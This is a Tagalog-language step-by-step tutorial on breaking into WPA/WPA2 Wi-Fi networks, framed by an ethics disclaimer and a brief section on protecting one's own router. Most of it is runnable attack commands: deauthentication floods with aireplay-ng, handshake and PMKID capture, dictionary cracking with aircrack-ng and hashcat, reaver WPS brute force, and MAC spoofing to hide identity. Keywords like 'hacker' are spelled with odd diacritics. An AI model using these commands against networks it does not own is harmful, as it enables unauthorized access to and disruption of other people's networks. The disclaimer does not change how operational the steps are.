MAHALAGANG BABALA: Ang tutorial na ito ay nilikha para sa edukasyonal at etikal na layunin lamang. Ang pag-access sa isang Wi-Fi network nang walang pahintulot ng may-ari ay îllégâl sa karamihan ng bansa at maaaring magresulta sa mabigat na parusa, multa, o pagkakakulong. HINDI namin hinihikayat ang anumang gawaing labag sa batas. Ang kaalamang ito ay dapat gamitin lamang sa iyong sariling network, sa mga network na may nakasulat na pahintulot, o sa mga controlled environment tulad ng CTF (Capture The Flag) o penetration testing labs. Ikaw lamang ang may pananagutan sa iyong mga aksyon.Layunin ng Tutorial
Matutunan mo ang mga karaniwang teknik na ginagamit ng mga security researcher at penetration tester upang suriin ang seguridad ng isang wireless network. Sakop nito ang:- Pagkuha ng WPA/WPA2 handshake
- Pag-crack ng password gamit ang dictionary/wordlist at brute-force
- Pagsasamantala sa WPS (Wi-Fi Protected Setup) PIN vulnerability
- Deauthentication attack para ma-reconnect ang isang client at makuha ang handshake
- Paggamit ng PMKID capture para sa mas modernong atake
- Pagprotekta sa iyong sariling network laban sa mga ganitong pag-atake
Mga Kinakailangan (Prerequisites)
Hardware
- Wireless adapter na sumusuporta sa monitor mode at packet injection (hal. Alfa AWUS036ACH, TP-Link TL-WN722N v1, o anumang chipset na may Atheros o Ralink). Ang built-in na Wi-Fi card ng laptop ay kadalasang hindi sumusuporta sa monitor mode, kaya kailangan ng external adapter.
- Isang computer na may Linux (mas mainam ang Kali Linux o Parrot OS dahil may pre-installed na tools) o Windows na may WSL at mga driver, pero mas madali sa Linux.
Software (sa Kali Linux, pre-installed ang mga ito)
- aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng)
- reaver (para sa WPS attack)
- wash (para mag-scan ng WPS-enabled networks)
- hashcat o john (para sa GPU-accelerated password cracking)
- hcxdumptool at hcxpcaptool (para sa PMKID attack)
- macchanger (opsyonal, para baguhin ang MAC address)
Kaalaman
- Pangunahing kaalaman sa Linux command line.
- Pag-unawa sa networking basics (IP, MAC, SSID, BSSID).
Hakbang-hakbang na Proseso
Hakbang 0: I-set up ang Wireless Adapter sa Monitor Mode
- I-plug ang external Wi-Fi adapter.
- Buksan ang terminal at tingnan kung nakikita ito:
bash
iwconfig
Karaniwang pangalan ng interface: wlan0, wlan1, etc. - Patayin ang anumang proseso na maaaring makaabala (NetworkManager, wpa_supplicant):
bash
sudo airmon-ng check kill - I-enable ang monitor mode:
bash
sudo airmon-ng start wlan0
Magkakaroon ng bagong interface na may pangalan tulad ng wlan0mon. - I-verify na nasa monitor mode na:
bash
iwconfig wlan0mon
Dapat makita ang "Mode:Monitor".
Hakbang 1: Pag-scan ng mga Available na Wi-Fi Network
Gamitin ang airodump-ng para i-scan ang lahat ng access point sa paligid.bash
sudo airodump-ng wlan0mon
Makikita mo ang listahan ng mga BSSID (MAC address ng router), ESSID (network name), channel, encryption type, at signal strength. Tandaan ang target na BSSID at channel.
Pumili ng target: Pumili ng network na may WPA/WPA2 encryption (karaniwan ang mga ito). Iwasan ang WEP dahil luma na at napakadaling i-crack (pero kung gusto mo, ibang usapan iyon).
Hakbang 2: I-focus ang Airodump sa Target Network
Gamitin ang command na ito para i-monitor ang target na network at i-save ang output sa isang file (hal. capture):bash
sudo airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0mon
Halimbawa:
bash
sudo airodump-ng -c 6 --bssid AA:BB:CC
D:EE:FF -w capture wlan0monIto ay magpapakita ng mga nakakonektang client (stations) sa network. Kailangan natin ng kahit isang connected client para makuha ang handshake.
Hakbang 3: Pagkuha ng WPA Handshake
Ang WPA handshake ay nangyayari kapag ang isang client ay kumokonekta sa access point. Kung walang bagong kumokonekta, maaari nating pilitin ang isang client na mag-reconnect gamit ang deauthentication attack.Opsyon A: Maghintay ng natural na koneksyon (passive)
- Iwanan ang airodump na tumatakbo at panoorin ang column na "Handshake" sa itaas na kanan. Kapag may nag-connect, lalabas ang "WPA handshake" sa itaas.
Opsyon B: Deauthentication Attack (aktibo)
Sa isang hiwalay na terminal, gamitin ang aireplay-ng para magpadala ng deauth packets sa isang client:bash
sudo aireplay-ng -0 5 -a [BSSID] -c [Client MAC] wlan0mon
- -0 5 – magpadala ng 5 deauth frames (pwede ring -0 0 para walang tigil).
- -a – BSSID ng router.
- -c – MAC address ng client (makikita sa airodump).
Tandaan: Kung walang client, hindi mo makukuha ang handshake. Maaari mong subukan ang PMKID attack (tingnan sa ibaba) na hindi nangangailangan ng client.
Hakbang 4: Pag-crack ng Handshake gamit ang Aircrack-ng
Ngayon ay mayroon na tayong .cap file (hal. capture-01.cap) na naglalaman ng handshake. Gagamit tayo ng wordlist para subukan ang mga posibleng password.Pumili ng Wordlist
- Ang Kali Linux ay may kasamang default wordlist sa /usr/share/wordlists/rockyou.txt (kailangan i-unzip: gunzip /usr/share/wordlists/rockyou.txt.gz).
- Maaari ka ring gumawa ng sarili mong wordlist gamit ang crunch o kumuha ng mas malalaking listahan tulad ng SecLists.
I-crack ang handshake
bashsudo aircrack-ng -w /path/to/wordlist.txt -b [BSSID] capture-01.cap
Halimbawa:
bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC
D:EE:FF capture-01.capKung nasa wordlist ang password, ipapakita ito sa screen. Kung hindi, kailangan ng mas malakas na wordlist o brute-force (na tumatagal ng napakatagal).
Hakbang 5: Advanced – Paggamit ng Hashcat para sa GPU-Accelerated Cracking
Mas mabilis ang Hashcat kumpara sa aircrack-ng dahil ginagamit nito ang GPU.- I-convert ang .cap file sa .hccapx format gamit ang aircrack-ng o cap2hccapx:
bash
aircrack-ng capture-01.cap -J capture.hccapx - Patakbuhin ang Hashcat:
bash
hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt --force- -m 2500 ay para sa WPA/WPA2.
- --force kung may compatibility issues.
Hakbang 6: WPS PIN Attack (Kung Enabled ang WPS)
Ang WPS ay may vulnerability kung saan ang PIN ay 8-digit at madaling ma-brute-force dahil sa split authentication (unang 4 digits at huling digit ay checksum). Gumamit ng reaver.- I-scan kung aling mga network ang may WPS enabled:
bash
sudo wash -i wlan0mon - Atakehin ang target:
bash
sudo reaver -i wlan0mon -b [BSSID] -c [channel] -vv- -vv para sa verbose output.
- Ang reaver ay susubok ng libu-libong PIN combination hanggang mahanap ang tama. Kapag nahanap na, ibibigay nito ang WPA PSK (password).
Hakbang 7: PMKID Attack (Walang Kailangan na Client)
Ang PMKID ay isang bagong paraan na hindi nangangailangan ng handshake o client. Ginagamit nito ang hcxdumptool at hcxpcaptool.- I-capture ang PMKID:
bash
sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1 - I-convert sa hash format na compatible sa hashcat:
bash
hcxpcaptool -z hash.txt capture.pcapng - I-crack gamit ang hashcat:
bash
hashcat -m 16800 hash.txt /usr/share/wordlists/rockyou.txt
Hakbang 8: Pagbabago ng MAC Address (Para sa Anonymity)
Kung nais mong itago ang iyong identity, maaari mong palitan ang MAC address ng iyong adapter bago ang anumang pag-atake (sa etikal na setting lang).bash
sudo ifconfig wlan0mon down
sudo macchanger -r wlan0mon # random MAC
sudo ifconfig wlan0mon up
Paano Protektahan ang Iyong Sariling Wi-Fi
Ngayong alam mo na ang mga taktikang ito, narito ang mga paraan upang mapalakas ang seguridad ng iyong network:- Gumamit ng WPA2-AES (hindi WPA2-TKIP) o WPA3 – mas matibay ang encryption.
- Gumamit ng mahaba at kumplikadong password – hindi bababa sa 12 characters, may uppercase, lowercase, numero, at special characters.
- I-disable ang WPS – ito ang pinakamalaking butas sa seguridad.
- I-update ang firmware ng router – upang ma-ρá†ch ang mga kilalang vulnerabilities.
- I-enable ang MAC filtering – ngunit ito ay madaling i-bypass, kaya hindi ito sapat.
- I-monitor ang mga connected device at maglagay ng alert para sa mga hindi kilalang koneksyon.
- Gumamit ng VPN para sa karagdagang layer ng privacy.
⚖ Legal at Etikal na Aspeto
- Sa Pilipinas, ang Republic Act No. 10175 (Cybercrime Prevention Act of 2012) ay nagpaparusa sa unauthorized access sa computer systems, kabilang ang Wi-Fi networks. Maaaring magmulta ng hanggang ₱500,000 o makulong ng hanggang 12 taon.
- Ang tanging legal na paraan upang gawin ito ay kapag ikaw ang may-ari ng network, o may nakasulat na pahintulot mula sa may-ari, o sa isang akademikong setting na may pahintulot.
- Bilang isang security researcher, palaging kumuha ng written authorization bago magsagawa ng anumang penetration test.
Karagdagang Tips at Tricks
- Paglikha ng Custom Wordlist: Gamitin ang cewl para gumawa ng wordlist batay sa website ng target (hal. cewl -w wordlist.txt target.com). Magdagdag ng mga common Filipino words, petsa, at pangalan.
- Brute-force gamit ang GPU: Kung may NVIDIA GPU, gamitin ang hashcat na may -O para i-optimize ang performance.
- Paggamit ng Multiple Wordlists: Pagsamahin ang ilang wordlist gamit ang cat o gumamit ng hashcat na may -r rules para ma-mutate ang mga salita.
- Pag-deauth sa lahat ng clients: Gamitin ang aireplay-ng -0 0 -a [BSSID] wlan0mon para walang tigil na deauth, ngunit mag-ingat dahil maaaring ma-detect ito at ma-block.
Konklusyon
Ang tutorial na ito ay nagbigay ng malalim na pag-unawa sa mga pamamaraan ng pag-häçk ng Wi-Fi. Ngunit tandaan: Ang kapangyarihan ay may kasamang responsibilidad. Gamitin ang kaalamang ito upang palakasin ang iyong sariling depensa, tulungan ang iba na ma-secure ang kanilang mga network, at mag-ambag sa mas ligtas na digital na mundo. Huwag kailanman gamitin ito para manlamang, manakaw, o makasira ng iba.Kung nais mong matuto pa, mag-aral ng mga kursong tulad ng Certified Ethical häçker (CEH) o Offensive Security Wireless Professional (OSWP). Maging isang etikal na häçker na nagtatanggol sa halip na sumisira.
Maligayang pag-aaral, at lagi mong isaisip ang batas at etika!
